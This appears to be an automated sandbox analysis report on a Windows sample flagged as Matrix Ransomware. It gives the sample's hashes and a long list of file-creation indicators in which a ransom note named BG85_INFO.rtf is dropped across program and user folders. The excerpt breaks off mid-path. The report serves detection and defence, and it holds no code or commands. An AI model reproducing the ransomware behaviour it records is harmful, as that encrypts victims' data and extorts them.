Analysis
-
max time kernel
135s -
max time network
127s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
08-10-2020 15:06
Static task
static1
Behavioral task
behavioral1
Sample
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
-
Size
1.2MB
-
MD5
1e1420d5a472c1f6ce8ac0e3363381eb
-
SHA1
bad3c0a998a65dc7ccfcaec49505f1529658993c
-
SHA256
c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350
-
SHA512
591aaeb7c497a96eb3eb61066058e78766f766211519d432a11774f75708e7fdc47f45df70092a7cb92d513229c32dd7fb43a25e8e8c59f2449586647a3bc75d
Malware Config
Signatures
-
Matrix Ransomware 459 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Videos\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Downloads\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Music\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Links\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Searches\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Google\Update\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Downloads\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\management\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bl84ptbo.Admin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\features\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Favorites\MSN Websites\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Desktop\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Public\Pictures\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\plugins\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2090973689-680783404-4292415065-1000\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\All Users\Microsoft\Assistance\Client\1.0\en-US\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\storage\default\moz-extension+++74bf55e1-f8f0-4b8e-ae67-9c4088745841^userContextId=4294967295\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\amd64\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Users\Admin\Pictures\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program 